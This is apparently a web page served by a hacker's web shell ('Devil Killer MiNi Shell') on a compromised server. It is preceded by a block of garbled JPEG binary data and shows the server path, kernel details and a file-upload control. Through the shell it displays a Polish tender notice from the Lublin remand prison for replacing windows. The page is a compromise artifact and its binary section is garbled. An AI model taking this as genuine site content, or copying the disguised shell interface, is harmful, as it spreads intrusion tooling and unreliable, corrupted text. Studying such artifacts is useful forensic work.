JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250327/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250327/0016488401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana okien w pawilonie mieszkalnym F w Areszcie Śledczym w Lublinie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Areszt Śledczy w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000590444</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poludniowa 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-482</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 81 7104400</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 81 7445715</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">as_lublin@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ssdip.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana okien w pawilonie mieszkalnym F w Areszcie Śledczym w Lublinie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-25243a88-2758-48b2-a8cc-1bb7906fe8c2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00164884</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00001826/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Wymiana okien w pawilonie mieszkalnym F w Areszcie Śledczym w Lublinie.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-25243a88-2758-48b2-a8cc-1bb7906fe8c2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z rozdziałem XV SWZ dostępnej pod adresem https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>1.	Administratorem Pani/Pana danych osobowych jest Dyrektor Aresztu Śledczego w Lublinie, ul. Południowa 5, 20-482 Lublin, tel. 81 710 44 00; e-mail: as_lublin@sw.gov.pl<br/>2.	Inspektorem Ochrony Danych w Areszcie Śledczym w Lublinie jest: mł. chor. Magdalena Kwiatkowska; ul. Południowa 5, 20-482 Lublin, tel. 81 710 44 06,e-mail: iod_lublin@sw.gov.pl<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji;<br/>4.	Odbiorcami Pani/Pana danych osobowych mogą być:<br/>1)	osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp oraz Dyrektor Aresztu Śledczego w Lublinie jako Administrator Danych Osobowych<br/>2)	inne podmioty, które na podstawie stosownych umów przetwarzają dane osobowe.<br/>5.	Pani/Pana dane osobowe w przypadku postępowań o udzielenie zamówienia publicznego będą przechowywane przez okres oznaczony kategorią archiwalną wskazaną w Jednolitym Rzeczowym Wykazie Akt Służby Więziennej. Dla dokumentów wytworzonych w ramach zamówień publicznych krajowych jest to okres 5 lat, dla zamówień publicznych unijnych jest to okres 10 lat. Natomiast umowy cywilno-prawne wraz z dokumentacją dotyczącą ich realizacji, niezależnie od trybu w jakim zostały zawarte, przechowywane są przez okres 10 lat. Okres przechowywania liczony jest od 1 stycznia roku następnego od daty zakończenia sprawy. Po upływie okresu przechowywania dokumentacja niearchiwalna podlega, po uzyskaniu zgody dyrektora właściwego archiwum państwowego, brakowaniu.<br/>6.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7.	Pani/Pana dane nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/><br/>8.	Posiada Pan/Pani:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2)	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>4)	prawo wniesienia skargi do organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, w przypadku uznania, że przetwarzanie Pani/Pana danych osobowych narusza przepisy RODO.<br/>9.	nie przysługuje Pani/Panu:<br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D/Kw.2232.4.2025.RS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja robót budowlanych przy zadaniu remontowym o nazwie „Wymiana okien w pawilonie mieszkalnym F w Areszcie Śledczym w Lublinie” polegających na wymianie okien w oddziałach mieszkalnych XI i XII pawilonu mieszkalnego F. <br/>Część I – oddział XII,<br/>Część II – oddział XI,<br/>Przedmiot zamówienia ma zostać zrealizowany w jednym etapie w przeciągu 120 dni od dnia podpisania umowy na realizację robót budowlanych na daną część. <br/>Zestawienie prac związanych z realizacją całości zadania inwestycyjnego pn. „Wymiana okien <br/>w pawilonie mieszkalnym F w Areszcie Śledczym w Lublinie” oraz obowiązki Wykonawcy zostały wyszczególnione w projektowanych postanowieniach umowy – załącznik nr 8. <br/>3.	Przedmiot zamówienia należy wykonać zgodnie ze specyfiką terenu budowy znajdującego <br/>się w jednostce penitencjarnej, ze szczególną dbałością o obiekty budowlane znajdujące <br/>się w bezpośrednim sąsiedztwie terenu budowy. <br/>4.	Do każdej z nazw firm, znaków firmowych, itp., które zostały wymienione w specyfikacji warunków zamówienia, oraz przedmiarze robót (stanowiących załączniki do niniejszej specyfikacji) – dodaje się słowa „lub równoważne” zamawiający rozumie rozwiązania techniczne, materiały lub urządzenia o nie gorszych parametrach niż wskazane w opisach. Wszelkie towary określone w dokumentacji, a pochodzące od konkretnych producentów, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać, aby spełnić wymagania zamawiającego. Wykonawca może zaproponować zastosowanie materiałów i urządzeń równoważnych opisanym w specyfikacji warunków zamówienia. W takim przypadku wykonawca jest zobowiązany wykazać, że oferowane przez niego towary (materiały i urządzenia) spełniają określone przez zamawiającego wymagania (kryteria równoważności). Wyroby budowlane powinny spełniać wymagania wynikające z Polskich Norm przenoszących normy europejskie PN-EN (normy zharmonizowane). Wykonawca ma obowiązek posiadać dokumenty potwierdzające pozwolenie na zastosowanie/wbudowanie wszystkich zastosowanych materiałów (atesty, aprobaty techniczne, świadectwa jakości i inne niezbędne dokumenty). <br/><br/>•	CZĘŚĆ I: ODDZIAŁ XII<br/>Realizacja prac obejmuję wymianę okien o nw. wymiarach mierzonych po wymiarze ramy okiennej:<br/>Szerokość (mm)	Wysokość (mm)	Ilość ( szt.)<br/>1760	1590	5<br/>1460	1590	38<br/>1470	1590	4<br/>840	1160	2<br/>1140	1160	1<br/><br/>Minimalne parametry okien:<br/>I.	Wszystkie okna muszą składać się z trzech szyb, gr. szyby 4 mm<br/>II.	Klasa bezpieczeństwa: standardowa<br/>III.	Kolor zewnętrzny i wewnętrzny: biały<br/>IV.	System okienny: rozwierno-uchylny<br/>V.	Kolor klamek i osłonek: biały <br/>VI.	Kolor uszczelek: czarny<br/>VII.	Szyby wewnętrzna i zewnętrzna zabezpieczone folią bezpieczną ( klasa O2)<br/>VIII.	Parapet wewnętrzny z konglomeratu gr. 20 mm - kolor beż <br/>IX.	Okna ze słupkiem stałym wykonane w systemie 2:1 jedna kwatera mniejsza jedna większa.<br/>X.	System okna większego – uchylne<br/>XI.	System okna mniejszego – uchylno-rozwierne<br/>XII.	Obciążenie wiatrem ≥ C2<br/>XIII.	Wodoszczelność ≥ 8A<br/>XIV.	Przepuszczalność powietrza – 4<br/>XV.	Współczynnik przepuszczalności energii promieniowania słonecznego g ≥ 51%<br/><br/>1.	Zakres prac<br/>a)	Demontaż okien i ościeżnic dotychczas zamontowanych w otworach okiennych<br/>b)	Montaż nowych okien w przygotowanych otworach<br/>c)	Montaż parapetów wewnętrznych<br/>d)	Obróbka glifów wewnętrznych ( tynkowanie, szpachlowanie, malowanie – kolor biały)<br/>e)	Uzupełnienie ewentualnych ubytków w elewacji, uszczelnienie połączeń pomiędzy elewacją a ramą okna.<br/><br/>2.	Materiały<br/>Wszystkie materiały , urządzenia i elementy sieci muszą być dopuszczone do obrotu <br/>i powszechnego lub jednostkowego stosowania w budownictwie zgodnie z Ustawą „Prawo budowlane – (Dz. U. z 2024 r. poz. 725, 834, 1222,1847,1881)<br/>Każdy materiał musi posiadać atest wytwórcy, stwierdzający zgodność jego wykonania <br/>z odpowiednimi normami.<br/>Wykaz materiałów niezbędnych do realizacji zadania określony jest w przedmiarze robót.<br/>W przypadku konieczności wykorzystania materiałów dodatkowych nieokreślonych <br/>w przedmiarze robót, wykonawca jest zobligowany do zakupu i montażu ich na własny koszt.<br/><br/>3.	Wykonanie robót<br/>Wykonawca zobowiązuję się do wykonania robót zgodnie ze „sztuką budowlaną” przy wykorzystaniu niezbędnych do wykonania robót narzędzi i materiałów dostarczonych do Aresztu Śledczego w Lublinie na własny koszt. Wykonawca zobowiązuje się do montażu niezbędnych urządzeń w sposób solidny i trwały. Wykonawca zobowiązuje się do uprzątnięcia terenu robót po zakończonych pracach remontowych. <br/> Zakres robót obejmuje demontaż dotychczas zainstalowanych okien w otworach okiennych, oraz montaż w ich miejscu nowo dostarczonych okien. Dodatkowo Wykonawca wykona prace związane z demontażem lastrykowych parapetów wewnętrznych oraz montażem nowych parapetów z konglomeratu. Wykonawca zobowiązuję się do wykonania robót wykończeniowych związanych z obróbkami glifów wewnętrznych oraz miejsc przy nowo zainstalowanych parapetach. Dodatkowo wykonawca ma obowiązek odbioru z terenu aresztu zdemontowanych okien wraz z ościeżnicami i utylizacji ich na własny koszt. <br/>	Po zewnętrznej stronie okna znajduje się krata stalowa oraz parapet zewnętrzny, których zakres robót nie obejmuje, wykonawca zobowiązuję się do wymiany okien w sposób nie powodujący uszkodzenia wymienionych elementów.<br/>	Ze względu na fakt iż, zdecydowana większość okien wymieniana będzie w celach mieszkalnych, wymiana będzie prowadzona sukcesywnie w miarę możliwości udostępniania cel. Areszt Śledczy w Lublinie jest w stanie jednorazowo zwolnić do pięciu cel mieszkalnych. W związku z tym prace montażowo wykończeniowe muszą być prowadzone sukcesywnie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45216113-9 - Roboty budowlane w zakresie budynków więziennych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45421132-8 - Instalowanie okien</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zawiera rozdział XXIII. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja robót budowlanych przy zadaniu remontowym o nazwie „Wymiana okien w pawilonie mieszkalnym F w Areszcie Śledczym w Lublinie” polegających na wymianie okien w oddziałach mieszkalnych XI i XII pawilonu mieszkalnego F. <br/>Część I – oddział XII,<br/>Część II – oddział XI,<br/>Przedmiot zamówienia ma zostać zrealizowany w jednym etapie w przeciągu 120 dni od dnia podpisania umowy na realizację robót budowlanych na daną część. <br/>Zestawienie prac związanych z realizacją całości zadania inwestycyjnego pn. „Wymiana okien <br/>w pawilonie mieszkalnym F w Areszcie Śledczym w Lublinie” oraz obowiązki Wykonawcy zostały wyszczególnione w projektowanych postanowieniach umowy – załącznik nr 8. <br/>3.	Przedmiot zamówienia należy wykonać zgodnie ze specyfiką terenu budowy znajdującego <br/>się w jednostce penitencjarnej, ze szczególną dbałością o obiekty budowlane znajdujące <br/>się w bezpośrednim sąsiedztwie terenu budowy. <br/>4.	Do każdej z nazw firm, znaków firmowych, itp., które zostały wymienione w specyfikacji warunków zamówienia, oraz przedmiarze robót (stanowiących załączniki do niniejszej specyfikacji) – dodaje się słowa „lub równoważne” zamawiający rozumie rozwiązania techniczne, materiały lub urządzenia o nie gorszych parametrach niż wskazane w opisach. Wszelkie towary określone w dokumentacji, a pochodzące od konkretnych producentów, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać, aby spełnić wymagania zamawiającego. Wykonawca może zaproponować zastosowanie materiałów i urządzeń równoważnych opisanym w specyfikacji warunków zamówienia. W takim przypadku wykonawca jest zobowiązany wykazać, że oferowane przez niego towary (materiały i urządzenia) spełniają określone przez zamawiającego wymagania (kryteria równoważności). Wyroby budowlane powinny spełniać wymagania wynikające z Polskich Norm przenoszących normy europejskie PN-EN (normy zharmonizowane). Wykonawca ma obowiązek posiadać dokumenty potwierdzające pozwolenie na zastosowanie/wbudowanie wszystkich zastosowanych materiałów (atesty, aprobaty techniczne, świadectwa jakości i inne niezbędne dokumenty).<br/><br/>•	CZĘŚĆ II: ODDZIAŁ XI<br/>Realizacja prac obejmuję wymianę okien o nw. wymiarach mierzonych po wymiarze ramy okiennej:<br/>Szerokość (mm)	Wysokość (mm)	Ilość ( szt.)<br/>1460	1590	38<br/>1760	1590	5<br/>1470	1590	3<br/>850	1160	1<br/>1150	1160	1<br/>840	1160	1<br/>1440	1590	1<br/>1450	1590	1<br/>1160	1180	1<br/><br/>Minimalne parametry okien:<br/>I.	Wszystkie okna muszą składać się z trzech szyb, gr. szyby 4 mm<br/>II.	Klasa bezpieczeństwa: standardowa<br/>III.	Kolor zewnętrzny i wewnętrzny: biały<br/>IV.	System okienny: rozwierno-uchylny<br/>V.	Kolor klamek i osłonek: biały <br/>VI.	Kolor uszczelek: czarny<br/>VII.	Szyby wewnętrzna i zewnętrzna zabezpieczone folią bezpieczną ( klasa O2)<br/>VIII.	Parapet wewnętrzny z konglomeratu gr. 20 mm - kolor beż <br/>IX.	Okna ze słupkiem stałym wykonane w systemie 2:1 jedna kwatera mniejsza jedna większa.<br/>X.	System okna większego – uchylne<br/>XI.	System okna mniejszego – uchylno-rozwierne<br/>XII.	Obciążenie wiatrem ≥ C2<br/>XIII.	Wodoszczelność ≥ 8A<br/>XIV.	Przepuszczalność powietrza – 4<br/>XV.	Współczynnik przepuszczalności energii promieniowania słonecznego g ≥ 51%<br/>1.	Zakres prac<br/>a)	Demontaż okien i ościeżnic dotychczas zamontowanych w otworach okiennych<br/>b)	Montaż nowych okien w przygotowanych otworach<br/>c)	Montaż parapetów wewnętrznych<br/>d)	Obróbka glifów wewnętrznych ( tynkowanie, szpachlowanie, malowanie – kolor biały)<br/>e)	Uzupełnienie ewentualnych ubytków w elewacji, uszczelnienie połączeń pomiędzy elewacją a ramą okna.<br/><br/>2.	Materiały<br/>Wszystkie materiały , urządzenia i elementy sieci muszą być dopuszczone do obrotu <br/>i powszechnego lub jednostkowego stosowania w budownictwie zgodnie z Ustawą „Prawo budowlane – (Dz. U. z 2024 r. poz. 725, 834, 1222,1847,1881)<br/>Każdy materiał musi posiadać atest wytwórcy, stwierdzający zgodność jego wykonania <br/>z odpowiednimi normami.<br/>Wykaz materiałów niezbędnych do realizacji zadania określony jest w przedmiarze robót.<br/>W przypadku konieczności wykorzystania materiałów dodatkowych nieokreślonych <br/>w przedmiarze robót, wykonawca jest zobligowany do zakupu i montażu ich na własny koszt.<br/><br/>3.	Wykonanie robót<br/>Wykonawca zobowiązuję się do wykonania robót zgodnie ze „sztuką budowlaną” przy wykorzystaniu niezbędnych do wykonania robót narzędzi i materiałów dostarczonych do Aresztu Śledczego w Lublinie 